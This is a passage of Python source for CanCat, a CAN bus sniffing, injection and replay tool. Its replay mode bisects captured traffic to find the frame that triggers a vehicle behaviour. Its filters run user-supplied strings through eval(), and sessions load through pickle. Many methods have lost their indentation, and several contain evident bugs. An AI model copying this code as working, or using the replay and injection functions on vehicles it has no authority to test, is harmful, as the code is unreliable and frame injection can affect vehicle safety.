                    if self._inbuf.startswith(b'@') != True:
                        self._rxtx_state = RXTX_SYNC
                        continue
                    pktlen = self._inbuf[1] + 2 # <size>, doesn't include "@"
                    if len(self._inbuf) >= pktlen:
                        self._queuelock.acquire()
                        try:
                            cmd = self._inbuf[2] # first bytes are @<size>
                            message = self._inbuf[3:pktlen]
                            self._inbuf = self._inbuf[pktlen:]
                        finally:
                            self._queuelock.release()
                        # generate the timestamp here
                        timestamp = time.time()
                        tsmsg = (timestamp, message)
                        #if we have a handler, use it
                        cmdhandler = self._cmdhandlers.get(cmd)
                        if cmdhandler != None:
                            cmdhandler(tsmsg, self)
                        # otherwise, file it
                        else:
                            self._submitMessage(cmd, tsmsg)
                        self._rxtx_state = RXTX_SYNC
            except:
                # keep the rx thread alive on any unexpected error; dump the
                # traceback only in verbose mode
                if self.verbose:
                    sys.excepthook(*sys.exc_info())
    def _submitMessage(self, cmd, tsmsg):
        '''
        Append a (timestamp, message) tuple to the mailbox for *cmd*,
        creating the mailbox and its "new message" Event on first use.
        *threadsafe* -- the append/set is guarded by self._queuelock.

        Returns the index at which the message was stored in the mailbox.
        '''
        mbox = self._messages.get(cmd)
        if mbox == None:
            # NOTE(review): mailbox creation happens outside the lock; two
            # threads racing on a brand-new cmd could each create a list and
            # one append would be lost -- confirm only the RX thread submits.
            mbox = []
            self._messages[cmd] = mbox
            self._msg_events[cmd] = threading.Event()
        try:
            self._queuelock.acquire()
            mbox.append(tsmsg)
            # wake anyone blocked waiting on this mailbox (see genCanMsgs tail mode)
            self._msg_events[cmd].set()
        except Exception as e:
            self.log("_submitMessage: ERROR: %r" % e, -1)
        finally:
            self._queuelock.release()
        return len(mbox)-1
def log(self, message, verbose=2):
'''
print a log message. Only prints if CanCat's verbose setting >=verbose
'''
if self.verbose >= verbose:
print("%.2f %s: %s" % (time.time(), self.name, message))
def recv(self, cmd, wait=None):
'''
Warning: Destructive:
removes a message from a mailbox and returns it.
For CMD_CAN_RECV mailbox, this will alter analysis results!
'''
start = time.time()
while (time.time() - start) < wait:
mbox = self._messages.get(cmd)
if mbox != None and len(mbox):
self._queuelock.acquire()
try:
timestamp, message = mbox.pop(0)
finally:
self._queuelock.release()
return timestamp, message
time.sleep(.01)
return None, None
def recvall(self, cmd):
'''
Warning: Destructive:
removes ALL messages from a mailbox and returns them.
For CMD_CAN_RECV mailbox, this is like getting a new
analysis session
'''
mbox = self._messages.get(cmd)
if mbox == None:
return []
self._queuelock.acquire()
try:
messages = list(mbox)
self._messages[cmd] = []
finally:
self._queuelock.release()
return messages
def _inWaiting(self, cmd):
'''
Does the given cmd mailbox have any messages??
'''
mbox = self._messages.get(cmd)
if mbox == None:
return 0
return len(mbox)
def _send(self, cmd, message):
'''
Send a message to the CanCat transceiver (not the CAN bus)
'''
msgchar = bytes(struct.pack(">H", len(message) + 3)) # 2 byte Big Endian
cmdByte = bytes(struct.pack('B', cmd))
message = self._bytesHelper(message)
msg = msgchar + cmdByte + message
self.log("XMIT: %s" % repr(msg), 4)
try:
self._out_lock.acquire()
try:
self._io.write(msg)
finally:
self._out_lock.release()
# FIXME: wait for response?
except Exception as e:
print("Exception: %r" % e)
#print("Could not acquire lock. Are you trying interactive commands without an active connection?")
def CANrecv(self, count=1):
'''
Warning: Destructive:
removes a message from the received CAN messages and returns it.
== This will alter analysis results! ==
'''
if count == -1:
count = self.getCanMsgCount()
for x in range(count):
yield self.recv(CMD_CAN_RECV)
def CANxmit(self, arbid, message, extflag=0, timeout=3, count=1):
'''
Transmit a CAN message on the attached CAN bus
Currently returns the *last* result
'''
msg = struct.pack('>I', arbid) + struct.pack('B', extflag) + self._bytesHelper(message)
for i in range(count):
self._send(CMD_CAN_SEND, msg)
ts, result = self.recv(CMD_CAN_SEND_RESULT, timeout)
if result == None:
print("CANxmit: Return is None!?")
return None
resval = ord(result)
if resval != 0:
print("CANxmit() failed: %s" % CAN_RESPS.get(resval))
return resval
def ISOTPxmit(self, tx_arbid, rx_arbid, message, extflag=0, timeout=3, count=1):
'''
Transmit an ISOTP can message. tx_arbid is the arbid we're transmitting,
and rx_arbid is the arbid we're listening for
'''
msg = struct.pack('>IIB', tx_arbid, rx_arbid, extflag) + message
for i in range(count):
self._send(CMD_CAN_SEND_ISOTP, msg)
ts, result = self.recv(CMD_CAN_SEND_ISOTP_RESULT, timeout)
if result == None:
print("ISOTPxmit: Return is None!?")
resval = ord(result)
if resval != 0:
print("ISOTPxmit() failed: %s" % CAN_RESPS.get(resval))
return resval
def ISOTPrecv(self, tx_arbid, rx_arbid, extflag=0, timeout=3, count=1, start_msg_idx=None):
'''
Receives an ISOTP can message. This function just causes
the hardware to send the appropriate flow control command
when an ISOTP frame is received from rx_arbid, using
tx_arbid for the flow control frame. The ISOTP frame
itself needs to be extracted from the received can messages
'''
if start_msg_idx is None:
start_msg_idx = self.getCanMsgCount()
# set the CANCat to respond to Flow Control messages
resval = self._isotp_enable_flowcontrol(tx_arbid, rx_arbid, extflag)
msg = self._getIsoTpMsg(rx_arbid, start_index=start_msg_idx, timeout=timeout)
return msg
def _isotp_enable_flowcontrol(self, tx_arbid, rx_arbid, extflag):
msg = struct.pack('>IIB', tx_arbid, rx_arbid, extflag)
self._send(CMD_CAN_RECV_ISOTP, msg)
ts, result = self.recv(CMD_CAN_RECV_ISOTP_RESULT, timeout)
if result == None:
print("_isotp_enable_flowcontrol: Return is None!?")
resval = ord(result)
if resval != 0:
print("_isotp_enable_flowcontrol() failed: %s" % CAN_RESPS.get(resval))
return resval
def ISOTPxmit_recv(self, tx_arbid, rx_arbid, message, extflag=0, timeout=3, count=1, service=None):
'''
Transmit an ISOTP can message, then wait for a response.
tx_arbid is the arbid we're transmitting, and rx_arbid
is the arbid we're listening for
'''
currIdx = self.getCanMsgCount()
msg = struct.pack('>II', tx_arbid, rx_arbid) + struct.pack('B', extflag) + self._bytesHelper(message)
for i in range(count):
self._send(CMD_CAN_SENDRECV_ISOTP, msg)
ts, result = self.recv(CMD_CAN_SENDRECV_ISOTP_RESULT, timeout)
if result == None:
print("ISOTPxmit: Return is None!?")
resval = ord(result)
if resval != 0:
print("ISOTPxmit() failed: %s" % CAN_RESPS.get(resval))
msg, idx = self._isotp_get_msg(rx_arbid, start_index = currIdx, service = service, timeout = timeout)
return msg, idx
    def _isotp_get_msg(self, rx_arbid, start_index=0, service=None, timeout=None):
        '''
        Internal Method to piece together a valid ISO-TP message from received CAN packets.

        Polls the captured-message list (via genCanMsgs) for frames with
        rx_arbid, feeding them to iso_tp.msg_decode() until a complete
        message is assembled or *timeout* seconds elapse.

        service: when given, only a payload whose first byte equals *service*
        (or the 0x7f negative-response code) is accepted; other completed
        messages are skipped and polling resumes after them.

        Returns (message_bytes, index_of_last_consumed_capture), or
        (None, next_start_index) on timeout.
        '''
        # NOTE(review): `found`, `complete` and `msg_found` are dead state --
        # `complete` is never set, so the loop only exits via return or timeout.
        found = False
        complete = False
        starttime = lasttime = time.time()
        # timeout=None (or 0) means poll forever
        while not complete and (not timeout or (lasttime-starttime < timeout)):
            time.sleep(0.01)
            msgs = [msg for msg in self.genCanMsgs(start=start_index, arbids=[rx_arbid])]
            if len(msgs):
                try:
                    # Check that the message is for the expected service, if specified
                    arbid, msg, count = iso_tp.msg_decode(msgs)
                    if msg[0] == 0x7e: # response for TesterPresent... ignore
                        # skip past the consumed frames and keep polling
                        start_index = msgs[count-1][0] + 1
                    elif service is not None:
                        # Check if this is the right service, or there was an error
                        if msg[0] == service or msg[0] == 0x7f:
                            msg_found = True
                            return msg, msgs[count-1][0]
                        print("Hey, we got here, wrong service code?")
                        start_index = msgs[count-1][0] + 1
                    else:
                        msg_found = True
                        return msg, msgs[count-1][0]
                except iso_tp.IncompleteIsoTpMsg as e:
                    #print(e) # debugging only, this is expected
                    pass
            lasttime = time.time()
            #print("_isotp_get_msg: status: %r - %r (%r) > %r" % (lasttime, starttime, (lasttime-starttime), timeout))
        if self.verbose:
            print("_isotp_get_msg: Timeout: %r - %r (%r) > %r" % (lasttime, starttime, (lasttime-starttime), timeout))
        return None, start_index
    def CANsniff(self, start_msg=None, arbids=None, advfilters=[], maxmsgs=None):
        '''
        Print messages in real time.
        start_msg - first message to print
            (None: the next message captured, 0: first message since starting CanCat)
        arbids - list of arbids to print (others will be ignored)
        advfilters - list of python code to eval for each message (message context provided)
            eg. ['pf==0xeb', 'sa==0', 'ps & 0xf']
            will print TP data message from source address 0 if the top 4 bits of PS
            are set.
            Expressions are evaluated from left to right in a "and" like fashion. If any
            expression evaluates to "False" and the message will be ignored.
            Variables mapped into default namespace:
                'arbid'
                'id'
                'ts'
                'data'
            J1939 adds 'pgn', 'pf', 'ps', 'edp', 'dp', 'sa'
            (this description is true for all advfilters, not specifically CANsniff)
        maxmsgs - stop after printing this many messages (None: run until keypress)

        Runs until a key is pressed (keystop()) or maxmsgs is exceeded.
        '''
        # NOTE(review): `maxmsgs < count` only stops AFTER count exceeds
        # maxmsgs, so maxmsgs+1 lines are printed -- confirm intended.
        count = 0
        # tail=True makes the underlying generator block waiting for new messages
        msg_gen = self.reprCanMsgsLines(start_msg=start_msg, arbids=arbids, advfilters=advfilters, tail=True)
        while True:
            if maxmsgs != None and maxmsgs < count:
                return
            line = next(msg_gen)
            print(line)
            count += 1
            if keystop():
                break
    def CANreplay(self, start_bkmk=None, stop_bkmk=None, start_msg=0, stop_msg=None, arbids=None, timing=TIMING_FAST):
        '''
        Replay captured packets between two bookmarks (or raw message indexes).
        timing = TIMING_FAST: just slam them down the CAN bus as fast as possible
        timing = TIMING_READ: send the messages using similar timing to how they
            were received
        timing = TIMING_INTERACTIVE: wait for the user to press Enter between each
            message being transmitted
        timing = TIMING_SEARCH: binary-search replay -- repeatedly replays the
            upper half of the range and asks the user whether the expected
            effect occurred, recursing until the triggering message is isolated
        '''
        # bookmarks, when given, override the raw message indexes
        if start_bkmk != None:
            start_msg = self.getMsgIndexFromBookmark(start_bkmk)
        if stop_bkmk != None:
            stop_msg = self.getMsgIndexFromBookmark(stop_bkmk)
        if timing == TIMING_SEARCH:
            # split the range; replay starts at the midpoint so the user can
            # bisect toward the message that causes the observed behavior
            diff = stop_msg - start_msg
            if diff == 1:
                mid_msg = stop_msg
                start_tmp = start_msg
            else:
                mid_msg = int(start_msg + math.floor((stop_msg - start_msg) / 2))
                start_tmp = start_msg
                start_msg = mid_msg
        last_time = -1
        newstamp = time.time()
        for idx,ts,arbid,data in self.genCanMsgs(start_msg, stop_msg, arbids=arbids):
            # delta_correction compensates for time we spent in this loop body
            laststamp = newstamp
            newstamp = time.time()
            delta_correction = newstamp - laststamp
            if timing == TIMING_INTERACTIVE:
                char = input("Transmit this message? %s (Y/n)" % reprCanMsg(idx, ts, arbid, data))
                if char is not None and len(char) > 0 and char[0] == 'n':
                    return
            elif timing == TIMING_SEARCH:
                # replay the candidate half, then ask the user which half to recurse into
                self.CANreplay(start_msg=mid_msg, stop_msg=stop_msg)
                char = input("Expected outcome? start_msg = %s, stop_msg = %s (Y/n/q)" % (mid_msg, stop_msg))
                if char is not None and len(char) > 0 and char[0] == 'q':
                    return
                if diff > 1:
                    if char is not None and len(char) > 0 and char[0] == 'y':
                        return self.CANreplay(start_msg=mid_msg, stop_msg=stop_msg, timing=TIMING_SEARCH)
                    elif char is not None and len(char) > 0 and char[0] == 'n':
                        return self.CANreplay(start_msg=start_tmp, stop_msg=mid_msg, timing=TIMING_SEARCH)
                else:
                    # range narrowed to a single message: report and stop
                    if char is not None and len(char) > 0 and char[0] == 'y':
                        print("Target message: %s" % (stop_msg))
                        return
                    elif char is not None and len(char) > 0 and char[0] == 'n':
                        print("Target message: %s" % (start_tmp))
                        return
            elif timing == TIMING_REAL:
                # sleep the originally-observed inter-message gap, minus loop overhead
                if last_time != -1:
                    delta = ts - last_time - delta_correction
                    if delta >= 0:
                        time.sleep(delta)
                last_time = ts
            self.CANxmit(arbid, data)
            if timing == TIMING_INTERACTIVE:
                print("Message transmitted")
def setCanBaud(self, baud_const=CAN_500KBPS):
'''
set the baud rate for the CAN bus. this has nothing to do with the
connection from the computer to the tool
'''
baud = struct.pack("B", baud_const)
self._send(CMD_CAN_BAUD, baud)
response = self.recv(CMD_CAN_BAUD_RESULT, wait=30)
self._config['can_baud'] = baud_const
while(response[1] != b'\x01'):
print("CAN INIT FAILED: Retrying")
response = self.recv(CMD_CAN_BAUD_RESULT, wait=30)
def setCanMode(self, mode):
'''
Sets the desired operation mode. Note that just setting the operational mode
does not change anything on the hardware, after changing the mode you must change
the baud rate in order to properly configure the hardware
'''
CAN_MODES = { v: k for k,v in globals().items() if k.startswith('CMD_CAN_MODE_') and k != 'CMD_CAN_MODE_RESULT' }
if mode not in CAN_MODES:
print("{} is not a valid can mode. Valid modes are:".format(mode))
for k in CAN_MODES:
print("{} ({})".format(CAN_MODES[k], k))
else:
self._send(CMD_CAN_MODE, chr(mode))
response = self.recv(CMD_CAN_MODE_RESULT, wait=30)
while(response[1] != b'\x01'):
print("CAN INIT FAILED: Retrying")
response = self.recv(CMD_CAN_MODE_RESULT, wait=30)
self._config['can_mode'] = mode
return response
def ping(self, buf='ABCDEFGHIJKL'):
'''
Utility function, only to send and receive data from the
CanCat Transceiver. Has no effect on the CAN bus
'''
buf = self._bytesHelper(buf)
self._send(CMD_PING, buf)
response = self.recv(CMD_PING_RESPONSE, wait=3)
return response
    def genCanMsgs(self, start=0, stop=None, arbids=None, tail=False, maxsecs=None):
        '''
        CAN message generator. takes in start/stop indexes as well as a list
        of desired arbids (list).  Yields (idx, ts, arbid, data) tuples,
        where ts is an offset from the first captured message's timestamp.

        tail=True keeps the generator alive after the current end of the
        mailbox, blocking on the mailbox's Event until new messages arrive.
        maxsecs limits the number of seconds this generator will go for. it's intended
        for use with tail
        '''
        messages = self.getCanMsgQueue()
        # get the ts of the first received message
        if messages != None and len(messages):
            startts = messages[0][0]
        else:
            startts = time.time()
        # start=None means "begin at whatever arrives next"
        if start == None:
            start = self.getCanMsgCount()
        if messages == None:
            stop = 0
        elif stop == None or tail:
            stop = len(messages)
        else:
            stop = stop + 1 # This makes the stop index inclusive if specified
        starttime = time.time()
        idx = start
        while tail or idx < stop:
            # obey our time restrictions
            # placed here to ensure checking whether we're receiving messages or not
            if maxsecs != None and time.time() > maxsecs+starttime:
                return
            # If we start sniffing before we receive any messages,
            # messages will be "None". In this case, each time through
            # this loop, check to see if we have messages, and if so,
            # re-create the messages handle
            if messages == None:
                messages = self._messages.get(self._msg_source_idx, None)
            # if we're off the end of the original request, and "tailing"
            if messages != None:
                if tail and idx >= stop:
                    msglen = len(messages)
                    self.log("stop=%d len=%d" % (stop, msglen), 3)
                    if stop == msglen:
                        self.log("waiting for messages", 3)
                        # wait for trigger event so we're not constantly polling
                        # (set by _submitMessage when a new message lands)
                        self._msg_events[self._msg_source_idx].wait(1)
                        self._msg_events[self._msg_source_idx].clear()
                        self.log("received 'new messages' event trigger", 3)
                    # we've gained some messages since last check...
                    stop = len(messages)
                    continue # to the big message loop.
                # now actually handle messages
                ts, msg = messages[idx]
                # make ts an offset instead of the real time.
                ts -= startts
                arbid, data = self._splitCanMsg(msg)
                if arbids != None and arbid not in arbids:
                    # allow filtering of arbids
                    idx += 1
                    continue
                yield((idx, ts, arbid, data))
                idx += 1
def _splitCanMsg(self, msg):
'''
takes in captured message
returns arbid and data
does not check msg size. MUST be at least 4 bytes in length as the
tool should send 4 bytes for the arbid
'''
arbid = struct.unpack(">I", msg[:4])[0]
data = msg[4:]
return arbid, data
def getCanMsgQueue(self):
'''
returns the list of interface/CAN messages for this object
for CanInterface, this is self._messages[CMD_CAN_RECV]
'''
return self._messages.get(self._msg_source_idx)
def getCanMsgCount(self):
'''
the number of CAN messages we've received this session
'''
canmsgs = self._messages.get(self._msg_source_idx, [])
return len(canmsgs)
def printSessionStatsByBookmark(self, start=None, stop=None):
'''
Prints session stats only for messages between two bookmarks
'''
print(self.getSessionStatsByBookmark(start, stop))
def printSessionStats(self, start=0, stop=None):
'''
Print session stats by Arbitration ID (aka WID/PID/CANID/etc...)
between two message indexes (where they sit in the CMD_CAN_RECV
mailbox)
'''
print(self.getSessionStats(start, stop))
def getSessionStatsByBookmark(self, start=None, stop=None):
'''
returns session stats by bookmarks
'''
if start != None:
start_msg = self.getMsgIndexFromBookmark(start)
else:
start_msg = 0
if stop != None:
stop_msg = self.getMsgIndexFromBookmark(stop)
else:
stop_msg = self.getCanMsgCount()
return(self.getSessionStats(start=start_msg, stop=stop_msg))
def getArbitrationIds(self, start=0, stop=None, reverse=False):
'''
return a list of Arbitration IDs
'''
arbids = {}
msg_count = 0
for idx,ts,arbid,data in self.genCanMsgs(start, stop):
arbmsgs = arbids.get(arbid)
if arbmsgs == None:
arbmsgs = []
arbids[arbid] = arbmsgs
arbmsgs.append((ts, data))
msg_count += 1
arbid_list = [(len(msgs), arbid, msgs) for arbid,msgs in arbids.items()]
arbid_list.sort(reverse=reverse)
return arbid_list
    def getSessionStats(self, start=0, stop=None):
        '''
        Build a per-arbid timing summary for the captured messages between
        *start* and *stop*: message count, mean inter-arrival time, the
        high/low inter-arrival deltas, and their midpoint.

        Returns the report as a single newline-joined string.
        '''
        out = []
        arbid_list = self.getArbitrationIds(start=start, stop=stop, reverse=True)
        for datalen, arbid, msgs in arbid_list:
            last = 0
            high = 0
            low = 0xffffffff
            for ts, data in msgs:
                # first message only seeds `last`; it has no predecessor delta
                if last == 0:
                    last = ts
                    continue
                # calculate the high and low
                delta = ts - last
                if delta > high:
                    high = delta
                if delta < low:
                    low = delta
                # track repeated values (rounded to nearest .001 sec)
                last = ts
            if datalen > 1:
                # mean = total span divided by number of gaps
                mean = (msgs[-1][0] - msgs[0][0]) / (datalen-1)
                # NOTE(review): labeled "median" in the output but computed as
                # the midpoint (midrange) of the high/low deltas
                median = low + (high-low) / 2
            else:
                low = 0
                mean = 0
                median = mean
            out.append("id: 0x%x\tcount: %d\ttiming:: mean: %.3f\tmedian: %.3f\thigh: %.3f\tlow: %.3f" % \
                    (arbid, datalen, mean, median, high, low))
        msg_count = self.getCanMsgCount()
        out.append("Total Uniq IDs: %d\nTotal Messages: %d" % (len(arbid_list), msg_count))
        return '\n'.join(out)
# TODO files still lacking compatibility between Python 2 and 3
def loadFromFile(self, filename, force=False):
'''
Load a previous analysis session from a saved file
see: saveSessionToFile()
'''
loadedFile = open(filename, 'rb')
me = pickle.load(loadedFile)
self.restoreSession(me, force=force)
self._filename = filename
def restoreSession(self, me, force=False):
'''
Load a previous analysis session from a python dictionary object
see: saveSession()
'''
if isinstance(self._io, serial.Serial) and force==False:
print("Refusing to reload a session while active session! use 'force=True' option")
return
self._messages = me.get('messages')
self.bookmarks = me.get('bookmarks')
self.bookmark_info = me.get('bookmark_info')
self.comments = me.get('comments')
# handle previous versions
ver = me.get('file_version')
if ver is not None:
self._config = me.get('config')
for cmd in self._messages:
self._msg_events[cmd] = threading.Event()
def saveSessionToFile(self, filename=None):
'''
Saves the current analysis session to the filename given
If saved previously, the name will already be cached, so it is
unnecessary to provide it again.
'''
if filename != None:
self._filename = filename
elif self._filename == None:
raise Exception('Cannot save to file when no filename given (and first time save)')
else:
filename = self._filename
savegame = self.saveSession()
me = pickle.dumps(savegame)
outfile = open(filename, 'wb')
outfile.write(me)
outfile.close()
def saveSession(self):
'''
Save the current analysis session to a python dictionary object
What you do with it form there is your own business.
This function is called by saveSessionToFile() to get the data
to save to the file.
'''
savegame = { 'messages' : self._messages,
'bookmarks' : self.bookmarks,
'bookmark_info' : self.bookmark_info,
'comments' : self.comments,
'file_version' : 1.0,
'class' : self.__class__,
'config' : self._config,
}
return savegame
# bookmark subsystem
def placeCanBookmark(self, name=None, comment=None):
'''
Save a named bookmark (with optional comment).
This stores the message index number from the
CMD_CAN_RECV mailbox.
DON'T USE CANrecv or recv(CMD_CAN_RECV) with Bookmarks or Snapshots!!
'''
mbox = self._messages.get(self._msg_source_idx)
if mbox == None:
msg_index = 0
else:
msg_index = len(mbox)
bkmk_index = len(self.bookmarks)
self.bookmarks.append(msg_index)
info = { 'name' : name,
'comment' : comment }
self.bookmark_info[bkmk_index] = info #should this be msg_index? benefit either way?
return bkmk_index
def getMsgIndexFromBookmark(self, bkmk_index):
return self.bookmarks[bkmk_index]
def getBookmarkFromMsgIndex(self, msg_index):
bkmk_index = self.bookmarks.index(msg_index)
return bkmk_index
def setCanBookmarkName(self, bkmk_index, name):
info = self.bookmark_info[bkmk_index]
info[name] = name
def setCanBookmarkComment(self, bkmk_index, comment):
info = self.bookmark_info[bkmk_index]
info[name] = name
def setCanBookmarkNameByMsgIndex(self, msg_index, name):
bkmk_index = self.bookmarks.index(msg_index)
info = self.bookmark_info[bkmk_index]
info[name] = name
def setCanBookmarkCommentByMsgIndex(self, msg_index, comment):
bkmk_index = self.bookmarks.index(msg_index)
info = self.bookmark_info[bkmk_index]
info[name] = name
def snapshotCanMessages(self, name=None, comment=None):
'''
Save bookmarks at the start and end of some event you are about to do
Bookmarks are named "Start_" + name and "Stop_" + name
DON'T USE CANrecv or recv(CMD_CAN_RECV) with Bookmarks or Snapshots!!
'''
start_bkmk = self.placeCanBookmark("Start_" + name, comment)
input("Press Enter When Done...")
stop_bkmk = self.placeCanBookmark("Stop_" + name, comment)
def filterCanMsgsByBookmark(self, start_bkmk=None, stop_bkmk=None, start_baseline_bkmk=None, stop_baseline_bkmk=None,
arbids=None, ignore=[], advfilters=[]):
if start_bkmk != None:
start_msg = self.getMsgIndexFromBookmark(start_bkmk)
else:
start_msg = 0
if stop_bkmk != None:
stop_msg = self.getMsgIndexFromBookmark(stop_bkmk)
else:
stop_bkmk = -1
if start_baseline_bkmk != None:
start_baseline_msg = self.getMsgIndexFromBookmark(start_baseline_bkmk)
else:
start_baseline_msg = None
if stop_baseline_bkmk != None:
stop_baseline_msg = self.getMsgIndexFromBookmark(stop_baseline_bkmk)
else:
stop_baseline_msg = None
return self.filterCanMsgs(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters)
def _getLocals(self, idx, ts, arbid, data):
return {'idx':idx, 'ts':ts, 'arbid':arbid, 'data':data}
    def filterCanMsgs(self, start_msg=0, stop_msg=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[], tail=False, maxsecs=None):
        '''
        returns the received CAN messages between indexes "start_msg" and "stop_msg"
        but only messages to ID's that *do not* appear in the the baseline indicated
        by "start_baseline_msg" and "stop_baseline_msg".
        for message indexes, you *will* want to look into the bookmarking subsystem!

        Yields (idx, ts, arbid, msg) tuples.

        SECURITY NOTE: each advfilter string is passed to eval() with the
        message fields as its namespace -- never accept advfilters from
        untrusted input.
        '''
        self.log("starting filtering messages...")
        if stop_baseline_msg != None:
            self.log("ignoring arbids from baseline...")
            # get a list of baseline arbids
            filter_ids = { arbid:1 for idx,ts,arbid,data in self.genCanMsgs(start_baseline_msg, stop_baseline_msg)
                    }.keys()
        else:
            filter_ids = None
        self.log("filtering messages...")
        # allow a single arbid to be passed without wrapping it in a list
        if arbids != None and type(arbids) != list:
            arbids = [arbids]
        for idx,ts,arbid,msg in self.genCanMsgs(start_msg, stop_msg, arbids=arbids, tail=tail, maxsecs=maxsecs):
            # keep the message if it is explicitly requested via arbids, OR if
            # it is neither ignored nor present in the baseline arbid set
            if not ((arbids != None and arbid in arbids) or arbid not in ignore and (filter_ids==None or arbid not in filter_ids)):
                self.log("skipping message: (%r, %r, %r, %r)" % ((idx, ts, arbid, msg)))
                continue
            # advanced filters allow python code to be handed in.  if any of the python code snippits result in "False" or 0, skip this message
            skip = False
            for advf in advfilters:
                lcls = self._getLocals(idx, ts, arbid, msg)
                if not eval(advf, lcls):
                    skip = True
            if skip:
                self.log("skipping message(adv): (%r, %r, %r, %r)" % ((idx, ts, arbid, msg)))
                continue
            yield (idx, ts, arbid, msg)
def printCanMsgsByBookmark(self, start_bkmk=None, stop_bkmk=None, start_baseline_bkmk=None, stop_baseline_bkmk=None,
arbids=None, ignore=[], advfilters=[]):
'''
deprecated: use printCanMsgs(start_bkmk=foo, stop_bkmk=bar)
'''
print(self.reprCanMsgsByBookmark(start_bkmk, stop_bkmk, start_baseline_bkmk, stop_baseline_bkmk, arbids, ignore, advfilters))
def reprCanMsgsByBookmark(self, start_bkmk=None, stop_bkmk=None, start_baseline_bkmk=None, stop_baseline_bkmk=None, arbids=None, ignore=[], advfilters=[]):
'''
deprecated: use reprCanMsgs(start_bkmk=foo, stop_bkmk=bar)
'''
out = []
if start_bkmk != None:
start_msg = self.getMsgIndexFromBookmark(start_bkmk)
else:
start_msg = 0
if stop_bkmk != None:
stop_msg = self.getMsgIndexFromBookmark(stop_bkmk)
else:
stop_bkmk = -1
if start_baseline_bkmk != None:
start_baseline_msg = self.getMsgIndexFromBookmark(start_baseline_bkmk)
else:
start_baseline_msg = None
if stop_baseline_bkmk != None:
stop_baseline_msg = self.getMsgIndexFromBookmark(stop_baseline_bkmk)
else:
stop_baseline_msg = None
return self.reprCanMsgs(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters)
def printCanMsgs(self, start_msg=0, stop_msg=None, start_bkmk=None, stop_bkmk=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[], pretty=False, paginate=None, viewbits=VIEW_ALL):
data = self.reprCanMsgsLines(start_msg, stop_msg, start_bkmk, stop_bkmk, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters, pretty, viewbits=viewbits)
pidx = 0
try:
while True:
line = next(data)
lines = line.split('\n')
for thing in lines:
print(thing)
pidx += 1
if paginate != None and pidx % paginate == 0:
inp = input("PRESS ENTER TO CONTINUE")
except StopIteration:
pass
    def reprCanMsgsLines(self, start_msg=0, stop_msg=None, start_bkmk=None, stop_bkmk=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[], pretty=False, tail=False, viewbits=VIEW_ALL):
        # FIXME: make different stats selectable using a bitfield arg (eg. REPR_TIME_DELTA | REPR_ASCII)
        '''
        String representation of a set of CAN Messages, yielded line by line.
        These can be filtered by start and stop message indexes, as well as
        use a baseline (defined by start/stop message indexes),
        by a list of "desired" arbids as well as a list of
        ignored arbids
        Many functions wrap this one.

        viewbits is a bitfield made up of VIEW_* options OR'd together:
            ... viewbits=VIEW_ASCII|VIEW_COMPARE)
        '''
        # bookmark arguments, when given, override the raw message indexes
        if start_bkmk != None:
            start_msg = self.getMsgIndexFromBookmark(start_bkmk)
        if stop_bkmk != None:
            stop_msg = self.getMsgIndexFromBookmark(stop_bkmk)
        if (viewbits & VIEW_BOOKMARKS) and start_msg in self.bookmarks:
            bkmk = self.bookmarks.index(start_msg)
            yield ("starting from bookmark %d: '%s'" %
                    (bkmk,
                    self.bookmark_info[bkmk].get('name'))
                    )
        if (viewbits & VIEW_BOOKMARKS) and stop_msg in self.bookmarks:
            bkmk = self.bookmarks.index(stop_msg)
            # NOTE(review): "stoppng" typo below is in a runtime string;
            # left untouched here to preserve output byte-for-byte
            yield ("stoppng at bookmark %d: '%s'" %
                    (bkmk,
                    self.bookmark_info[bkmk].get('name'))
                    )
        last_msg = None
        next_bkmk = 0
        next_bkmk_idx = 0
        msg_count = 0
        last_ts = None
        tot_delta_ts = 0
        counted_msgs = 0    # used for calculating averages, excluding outliers
        data_delta = None
        data_repeat = 0
        data_similar = 0
        for idx, ts, arbid, msg in self.filterCanMsgs(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids=arbids, ignore=ignore, advfilters=advfilters, tail=tail):
            # insert bookmark names/comments in appropriate places
            while next_bkmk_idx < len(self.bookmarks) and idx >= self.bookmarks[next_bkmk_idx]:
                yield (self.reprBookmark(next_bkmk_idx))
                next_bkmk_idx += 1
            msg_count += 1
            diff = []
            # check data: count how many payload bytes changed vs the previous message
            byte_cnt_diff = 0
            if (viewbits & VIEW_COMPARE) and last_msg != None:
                if len(last_msg) == len(msg):
                    for bidx in range(len(msg)):
                        if last_msg[bidx] != msg[bidx]:
                            byte_cnt_diff += 1
                    if byte_cnt_diff == 0:
                        diff.append("REPEAT")
                        data_repeat += 1
                    elif byte_cnt_diff <=4:
                        diff.append("Similar")
                        data_similar += 1
                    # FIXME: make some better heuristic to identify "out of norm"
            # look for ASCII data (4+ consecutive bytes)
            if (viewbits & VIEW_ASCII) and hasAscii(msg):
                diff.append("ASCII: %s" % repr(msg))
            # calculate timestamp delta and comment if out of whack
            if last_ts == None:
                last_ts = ts
            delta_ts = ts - last_ts
            if counted_msgs:
                avg_delta_ts = tot_delta_ts / counted_msgs
            else:
                avg_delta_ts = delta_ts
            # deltas close to the running average feed the average; outliers
            # are annotated instead (when VIEW_TS_DELTA is enabled)
            if abs(delta_ts - avg_delta_ts) <= delta_ts:
                tot_delta_ts += delta_ts
                counted_msgs += 1
            elif (viewbits & VIEW_TS_DELTA):
                diff.append("TS_delta: %.3f" % delta_ts)
            if pretty:
                # visually separate bursts that are ~1s or more apart
                if delta_ts >= .95:
                    yield ('')
            msgrepr = self._reprCanMsg(idx, ts, arbid, msg, comment='\t'.join(diff))
            # allow _reprCanMsg to return None to skip printing the message
            if msgrepr != DONT_PRINT_THIS_MESSAGE:
                yield msgrepr
            last_ts = ts
            last_msg = msg
        if viewbits & VIEW_ENDSUM:
            yield ("Total Messages: %d (repeat: %d / similar: %d)" % (msg_count, data_repeat, data_similar))
def reprCanMsgs(self, start_msg=0, stop_msg=None, start_bkmk=None, stop_bkmk=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[], pretty=False, tail=False, viewbits=VIEW_ALL):
